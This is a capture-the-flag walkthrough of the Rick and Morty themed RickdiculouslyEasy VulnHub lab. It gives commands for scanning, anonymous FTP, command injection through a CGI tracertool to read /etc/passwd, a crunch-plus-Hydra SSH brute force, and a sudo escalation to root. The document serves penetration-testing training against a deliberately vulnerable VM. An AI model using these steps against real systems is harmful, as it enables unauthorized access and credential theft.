# RickdiculouslyEasy: 1 VulnHub WriteUp

In this lab we take on another CTF challenge, RickdiculouslyEasy by Luke. It is a very simple Rick and Morty themed boot-to-root: the goal is to collect all the flags and end up as root. If you are new to pentesting, it is worth a try!

<figure><img src="/files/HobXGKMglKKPoIn11gKV" alt=""><figcaption><p>Every lab, every wallpaper</p></figcaption></figure>

### Download

* **RickdiculouslyEasy.zip** (Size: 761 MB)
* **Download**: <https://drive.google.com/open?id=0BzB6wBgc606JNmNNdU9waGNGTmM>
* **Download (Mirror)**: <https://download.vulnhub.com/rickdiculouslyeasy/RickdiculouslyEasy.zip>

### **Penetration Methodology**

**Scanning**

* Discovering Targets IP
* Network scanning (Nmap)

**Enumeration**

* Surfing HTTP service port
* Directory Enumeration
* Connect to ftp
* Command Injection

**Exploiting**

* SSH login using Metasploit
* Bruteforce login using Hydra
* Connecting to the shell on port 60000 with Netcat

**Privilege Escalation**

* Checking SUID binaries
* Accessing root directory
* Capture the flag

### **Scanning**

After loading up the VM, our first step was to find the target's IP address.

```bash
netdiscover
```

<figure><img src="/files/qVr1B0QuZ8YLbddH0YgR" alt=""><figcaption></figcaption></figure>

We found our target's IP address to be 192.168.1.101; the next step was to scan it with nmap.

```bash
nmap -p- -A 192.168.1.101
```

The scan showed several open ports. Our first flag came back as the banner of the service on port 13337, and anonymous FTP login was allowed on port 21, where another FLAG.txt was waiting.

<figure><img src="/files/yFzuX7MDuQmkpgRQeuAE" alt=""><figcaption></figcaption></figure>

### **Enumeration**

From the nmap scan we knew that anonymous FTP login was available, so we logged in with the username 'anonymous' and a blank password. In the ftp console, **ls** showed a **'FLAG.txt'**, and **get** downloaded it to the Kali box. Our second flag was inside.

{% code lineNumbers="true" %}

```bash
ftp 192.168.1.101
ls
get FLAG.txt
quit
cat FLAG.txt
```

{% endcode %}

<figure><img src="/files/craWfXBomFOGHISH9fp2" alt=""><figcaption></figcaption></figure>

The nmap result also showed an HTTP service on port 80. Browsing to the target's IP, however, showed nothing useful.

<figure><img src="/files/W3F48lFltVOboQ5eU8U9" alt=""><figcaption></figcaption></figure>

Next, we enumerated the web root with dirb, which turned up two interesting paths: the '/passwords/' directory and '/robots.txt'.

```bash
dirb http://192.168.1.101/
```

<figure><img src="/files/MDtJf9BH9Dw4nn0M02Vw" alt=""><figcaption></figcaption></figure>

Viewing ‘**/passwords/’** directory displayed **‘FLAG.txt’** and **‘password.html’**.

<figure><img src="https://i0.wp.com/1.bp.blogspot.com/-qSg2fVeZWMA/XQuh1VN7CCI/AAAAAAAAe7c/R-Uz5DftW98nhVmUg79plzQpHCOchJO_QCLcBGAs/s1600/6.png?w=640&#x26;ssl=1" alt=""><figcaption></figcaption></figure>

We found our third flag here; so far it was a cakewalk.

<figure><img src="https://i0.wp.com/1.bp.blogspot.com/-slcx6iva-ec/XQuh2FAKKvI/AAAAAAAAe7g/plFTqehv2acM81JPm-f-g-cPH2rw3pPQACLcBGAs/s1600/7.png?w=640&#x26;ssl=1" alt=""><figcaption></figcaption></figure>

Browsing '**/passwords/password.html'** hinted that a password was hidden somewhere on the page.

<figure><img src="/files/okkIhEt6gtlv4tPn7h27" alt=""><figcaption></figcaption></figure>

So we viewed the page source, and the instinct was right: it contains the password "winter", which we could use somewhere later.

<figure><img src="https://i0.wp.com/1.bp.blogspot.com/-qy_0DuzQdCQ/XQuh3ULPO5I/AAAAAAAAe7o/dU_5jJtIg8Aldui_YXKTefdDtQjihHiiwCLcBGAs/s1600/9.png?w=640&#x26;ssl=1" alt=""><figcaption></figcaption></figure>

Next, we opened '/robots.txt' and found links to two files, '/cgi-bin/root\_shell.cgi' and '/cgi-bin/tracertool.cgi'.

<figure><img src="https://i0.wp.com/1.bp.blogspot.com/-68lqcbff4vU/XQuhvoW4beI/AAAAAAAAe6Q/yLV23BzCYRQvQZbCN2dHfvtWNQ3wVYY0ACLcBGAs/s1600/10.png?w=640&#x26;ssl=1" alt=""><figcaption></figcaption></figure>

Only '/cgi-bin/tracertool.cgi' turned out to be useful: the address we submitted was passed to a shell command without sanitization, so we could inject our own commands (effectively RCE).

<figure><img src="https://i0.wp.com/1.bp.blogspot.com/-SPXf9JxpUqY/XQuhvyrvtYI/AAAAAAAAe6Y/5uEiBS9no-YXfmQn_NQ5EWLKyzoUddS1QCLcBGAs/s1600/11.png?w=640&#x26;ssl=1" alt=""><figcaption></figcaption></figure>

We also found that a few commands were filtered: **cat** did not work, so we used **more** to read **/etc/passwd** and list the users. There were three human users, RickSanchez, Morty and Summer. Summer could plausibly be paired with the 'winter' password we found earlier.

<figure><img src="/files/10rvenrbtYvZNzrecUnj" alt=""><figcaption></figcaption></figure>

### **Exploiting**

It was time to log in over SSH, which runs on port 22222, using Metasploit's ssh_login scanner with the newly acquired credentials. We found one more flag in the directory we landed in.

{% code lineNumbers="true" %}

```bash
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.101
set rport 22222
set username Summer
set password winter
exploit
sessions -u 1
sessions 2
ls
cat FLAG.txt
```

{% endcode %}

<figure><img src="/files/9pp9MVwLFDPb6xQ8yx5G" alt=""><figcaption></figcaption></figure>

Further enumeration of /home showed three directories named after the users we found earlier. From Morty's directory we downloaded two files, 'Safe\_Password.jpg' and 'journal.txt.zip'.

{% code lineNumbers="true" %}

```bash
cd /home
ls
cd Morty
ls
download Safe_Password.jpg .
download journal.txt.zip .
```

{% endcode %}

<figure><img src="/files/xpkReLfk2VASmCa75Id0" alt=""><figcaption></figcaption></figure>

Safe\_Password.jpg is an image file, but running strings on it shows the password **"Meeseek"** embedded inside.

```bash
strings Safe_Password.jpg
```

<figure><img src="/files/rpo9B7FrykPSBBrspvxx" alt=""><figcaption></figcaption></figure>

Unzipping the archive with the password 'Meeseek' gave us journal.txt, and the next flag is inside it.

{% code lineNumbers="true" %}

```bash
unzip -P Meeseek journal.txt.zip
cat journal.txt
```

{% endcode %}

Along with the flag there was a number string '**131333**', and the message in the file hinted that it was some kind of password.

<figure><img src="https://i0.wp.com/1.bp.blogspot.com/-VINMYTPKo_w/XQuhxgPfhfI/AAAAAAAAe6o/8M8SyFWIqowyDqAgxohCQdstyARBcUDZgCLcBGAs/s1600/16.png?w=640&#x26;ssl=1" alt=""><figcaption></figcaption></figure>

Back on the target, the 'RickSanchez' home directory has a subdirectory named "RICK\_SAFE", which the journal had mentioned. Inside it is an executable named "safe". We downloaded it to the Kali machine.

{% code lineNumbers="true" %}

```bash
cd /home/RickSanchez
ls
cd RICK_SAFE
ls
download safe .
```

{% endcode %}

<figure><img src="/files/VwwqXVY6nlvqvbufMnZB" alt=""><figcaption></figcaption></figure>

After making 'safe' executable (chmod +x is enough; 777 is overkill) and running it with the number from the journal, it displayed the next flag, along with clues about Rick's password.

{% code lineNumbers="true" %}

```bash
chmod +x safe
./safe
./safe 131333
```

{% endcode %}

<figure><img src="/files/pvM0iKyvO4T0QbOy4khK" alt=""><figcaption></figcaption></figure>

The clue says the next password is one uppercase character and one digit followed by one of the words in the name of Rick Sanchez's old band. A bit of web surfing gave the band's name, 'The Flesh Curtains'. So we used crunch to build two pattern lists (in crunch's -t syntax, ',' stands for an uppercase letter and '%' for a digit) and appended both to dict.txt.

{% code lineNumbers="true" %}

```bash
crunch 10 10 -t ,%Curtains >> dict.txt
crunch 7 7 -t ,%Flesh >> dict.txt
```

{% endcode %}

<figure><img src="/files/26WEUZjJ4iaSPGvbIKQh" alt=""><figcaption></figcaption></figure>
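To see exactly what those two crunch masks expand to, and to sanity-check the size of the list before spending it on a network brute force, here is the same keyspace generated in plain POSIX shell. This is an added example, not part of the original writeup; it assumes only the band name and mask format stated above.

```sh
#!/bin/sh
# Added example (not from the original writeup): rebuild the candidate list
# described by the crunch masks ",%Curtains" and ",%Flesh" without crunch.
# In crunch's -t syntax "," is one uppercase letter and "%" is one digit.

# gen_mask_list WORD...: print <Upper><Digit><WORD> for every combination,
# in the same order crunch would (A0..A9, B0..B9, ... for each word).
gen_mask_list() {
    for word in "$@"; do
        for upper in A B C D E F G H I J K L M N O P Q R S T U V W X Y Z; do
            for digit in 0 1 2 3 4 5 6 7 8 9; do
                printf '%s%s%s\n' "$upper" "$digit" "$word"
            done
        done
    done
}

# expected_count WORD...: size of the keyspace, 26 letters * 10 digits * words.
expected_count() {
    echo $(( 26 * 10 * $# ))
}

# Usage:
#   gen_mask_list Flesh Curtains > dict.txt
#   expected_count Flesh Curtains          # 520
#   hydra -l RickSanchez -P dict.txt -s 22222 192.168.1.101 ssh
```

Knowing the count matters: 520 SSH attempts is trivial, but the same mask with a lowercase letter and a full-size band name list would not be, and hydra against sshd with default rate limits is slow.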

Then we used Hydra to try every password in dict.txt against the RickSanchez account on the SSH service.

```bash
hydra -l RickSanchez -P dict.txt -s 22222 192.168.1.101 ssh
```

Great! we found a user/password pair.

<figure><img src="/files/FWbUkniCFlQloRop7lui" alt=""><figcaption></figcaption></figure>

### **Privilege Escalation**

We then logged in over ssh with the new credentials. Remembering the hint in the last flag that "sudo is wheely good", we ran sudo -l to see his permissions: he could run ALL commands with sudo, so we simply spawned a root shell. In /root we found the next flag in FLAG.txt, but, as before, we had to read it with 'more' because 'cat' does not work on this box.

{% code lineNumbers="true" %}

```bash
ssh RickSanchez@192.168.1.101 -p 22222
sudo -l
sudo su
cd /root
ls
cat FLAG.txt
more FLAG.txt
```

{% endcode %}

<figure><img src="/files/rHd1LkOUJ8XGqDePIUdq" alt=""><figcaption></figcaption></figure>
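Twice on this box (reading /etc/passwd through tracertool.cgi, and reading the root flag) 'cat' failed while 'more' worked. The writeup does not say how cat was neutered, and it is worth finding out rather than guessing: a command that "does not work" may be a shell alias, a function, or a replaced binary on PATH. The check below is an added example, not part of the original writeup; it assumes a Linux-style PATH and a GNU or BSD head/od.

```sh
#!/bin/sh
# Added example (not from the original writeup): tell whether a command on
# PATH is still a native binary or has been swapped for a wrapper script.

# file_kind PATH: "elf" for a native executable, "script" for a "#!" text
# script, otherwise "other", decided from the first four bytes.
file_kind() {
    f=$1
    magic=$(head -c 4 "$f" | od -An -tx1 | tr -d ' \n')
    case $magic in
        7f454c46) echo elf ;;
        2321*)    echo script ;;
        *)        echo other ;;
    esac
}

# check_cmd NAME: resolve NAME the way the shell would and report
# "NAME -> path (kind)". Aliases and functions are not files, so in an
# interactive shell also run `type NAME` to see those.
check_cmd() {
    p=$(command -v "$1") || { echo "$1 -> not found"; return 1; }
    case $p in
        /*) ;;
        *) echo "$1 -> $p (builtin/function)"; return 0 ;;
    esac
    real=$(readlink -f "$p" 2>/dev/null || echo "$p")
    echo "$1 -> $real ($(file_kind "$real"))"
}

# Usage on the target, once you have any shell:
#   for c in cat more less head tail tac; do check_cmd "$c"; done
```

If cat resolves to a script, reading it tells you exactly what the box does with your input; if it is a real ELF, the filtering sits in the CGI itself and only affects the injection path, not the root shell.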

Now we were root, with 110 points out of 130. Where were the missing 20 points? We still had not checked a few of the open ports.

Connecting to port 60000 with netcat dropped us straight into a shell. **ls** showed **FLAG.txt** and **cat** printed the flag.

{% code lineNumbers="true" %}

```bash
nc 192.168.1.101 60000
ls
cat FLAG.txt
```

{% endcode %}

<figure><img src="/files/yCRT1oz9SSBlIP4DOyrc" alt=""><figcaption></figcaption></figure>

Opening port 9090 in a web browser showed the last flag. That completes the box.

<figure><img src="/files/mhip7zxz3LhAIzhsGzJc" alt=""><figcaption></figcaption></figure>

**Author**: Eopi Noriko is a passionate Cybersecurity Researcher, contact [Facebook](https://www.facebook.com/Thuong.EoPi/).

